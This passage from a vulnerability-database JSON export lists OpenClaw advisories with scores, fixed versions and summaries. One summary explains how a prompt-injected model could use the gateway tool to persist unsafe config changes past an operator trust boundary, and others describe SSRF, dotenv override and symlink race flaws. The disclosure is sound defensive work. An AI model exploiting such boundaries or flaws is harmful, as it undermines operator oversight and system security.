                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"
                }
            ],
            "aliases": [
                "CVE-2026-34425",
                "GHSA-fvx6-pj3r-5q4q"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y7sd-j9xn-qffs"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95220?format=api",
            "vulnerability_id": "VCID-ye4t-n6r3-67ab",
            "summary": "OpenClaw's gateway config mutation guard allowed unsafe model-driven config writes\n## Summary\n\nThe agent-facing `gateway` tool protects `config.apply` and `config.patch` with a model-to-operator trust boundary. That guard used a hand-maintained denylist of protected config paths. The config schema outgrew that denylist, leaving sensitive subtrees writable through model-driven gateway config mutations.\n\n## Impact\n\nA prompt-injected or otherwise compromised model running with access to the owner-only `gateway` tool could persist unsafe config changes that crossed security boundaries. Examples included config paths affecting command execution, network/proxy/TLS behavior, credential forwarding, telemetry or hook endpoints, memory/indexing surfaces, and operator policy controls. These changes could survive restart once written to config.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected: versions before `2026.4.23`\n- Fixed: `2026.4.23`\n- Latest stable verified fixed: `openclaw@2026.4.23`, tag `v2026.4.23`\n\n## Fix\n\nOpenClaw replaced the denylist with a fail-closed allowlist. Agent-driven `gateway config.apply` and `gateway config.patch` now permit only narrow agent-tunable prompt/model settings and mention-gating paths. Other config changes are rejected before the gateway mutation RPC is invoked.\n\n## Fix Commit(s)\n\n- `bceda6089aa7b3695cc7696b43c61ae3d01bb0ec` (`fix(gateway): fail closed on runtime config edits`)\n\n## Severity\n\nSeverity remains `high`. The vulnerable entry point is owner-only, but the model/agent is not a trusted principal under OpenClaw's security model, and the guard is the explicit model-to-operator boundary for persisted config mutation.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/bceda6089aa7b3695cc7696b43c61ae3d01bb0ec",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/bceda6089aa7b3695cc7696b43c61ae3d01bb0ec"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cwj3-vqpp-pmxr",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cwj3-vqpp-pmxr"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-cwj3-vqpp-pmxr",
                    "reference_id": "GHSA-cwj3-vqpp-pmxr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-cwj3-vqpp-pmxr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/114733?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.23",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.23"
                }
            ],
            "aliases": [
                "GHSA-cwj3-vqpp-pmxr"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ye4t-n6r3-67ab"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89627?format=api",
            "vulnerability_id": "VCID-yhpq-5qy3-y7bn",
            "summary": "OpenClaw: Workspace dotenv could override runtime-control environment variables\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nWorkspace `.env` loading did not reserve the `OPENCLAW_` runtime-control namespace broadly enough. A malicious workspace could set variables such as `OPENCLAW_GIT_DIR` before source-update or installer flows, potentially steering trusted OpenClaw runtime behavior.\n\nThis requires running OpenClaw from an attacker-controlled workspace. Severity is medium.\n\n## Fix\n\nOpenClaw now reserves the workspace `OPENCLAW_` environment namespace and rejects workspace dotenv entries for OpenClaw runtime-control variables.\n\nFix commit:\n\n- `018494fa3ebb9145112e68b56fe1cb2e9f9a9ed6`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44114",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00022",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06532",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00022",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0653",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00024",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07178",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44114"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/018494fa3ebb9145112e68b56fe1cb2e9f9a9ed6",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:52:56Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/018494fa3ebb9145112e68b56fe1cb2e9f9a9ed6"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hxvm-xjvf-93f3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:52:56Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hxvm-xjvf-93f3"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44114",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44114"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-namespace-collision-via-workspace-dotenv",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:52:56Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-namespace-collision-via-workspace-dotenv"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-hxvm-xjvf-93f3",
                    "reference_id": "GHSA-hxvm-xjvf-93f3",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-hxvm-xjvf-93f3"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.20",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"
                }
            ],
            "aliases": [
                "CVE-2026-44114",
                "GHSA-hxvm-xjvf-93f3"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yhpq-5qy3-y7bn"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90336?format=api",
            "vulnerability_id": "VCID-ykwt-tdpa-3bft",
            "summary": "OpenClaw: SSRF via Unguarded `fetch()` in Marketplace Plugin Download and Ollama Model Discovery\n## Summary\nSSRF via Unguarded `fetch()` in Marketplace Plugin Download and Ollama Model Discovery\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Keep the shipped marketplace archive-fetch SSRF, but narrow out the Ollama half because it is operator-configured and overlaps weaker trust-model or duplicate SSRF ground.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8deb9522f3d2680820588b190adb4a2a52f3670b` — 2026-03-30T20:08:38+01:00\n\nOpenClaw thanks @tdjackey for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41302",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00043",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13336",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00043",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13378",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00043",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13373",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41302"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/8deb9522f3d2680820588b190adb4a2a52f3670b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T16:02:24Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/8deb9522f3d2680820588b190adb4a2a52f3670b"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9q7v-8mr7-g23p",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T16:02:24Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9q7v-8mr7-g23p"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41302",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41302"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-fetch-in-marketplace-plugin-download",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T16:02:24Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-fetch-in-marketplace-plugin-download"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-9q7v-8mr7-g23p",
                    "reference_id": "GHSA-9q7v-8mr7-g23p",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-9q7v-8mr7-g23p"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41302",
                "GHSA-9q7v-8mr7-g23p"
            ],
            "risk_score": 3.4,
            "exploitability": "0.5",
            "weighted_severity": "6.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ykwt-tdpa-3bft"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/92141?format=api",
            "vulnerability_id": "VCID-ymmv-2qmq-6kap",
            "summary": "OpenClaw: OpenShell FS bridge reads pin and verify the opened file before returning bytes\n## Summary\nOpenShell FS bridge reads now pin and verify the opened file before returning bytes.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nA time-of-check/time-of-use race around OpenShell sandbox filesystem reads could let a symlink swap cause a read to return bytes from outside the intended mount root.\n\n## Fix\nOpenShell reads now open the file with no-follow semantics where available, validate the pinned file descriptor against the canonical mount root, reject unsafe hardlink/symlink cases, and use a strict fallback ancestor walk on platforms without fd-path readback.\n\n## Fix Commit(s)\n- 95119017c847c737bd113f0bff728c4666d79c45\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nThanks @VladimirEliTokarev for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44113",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09994",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09978",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00038",
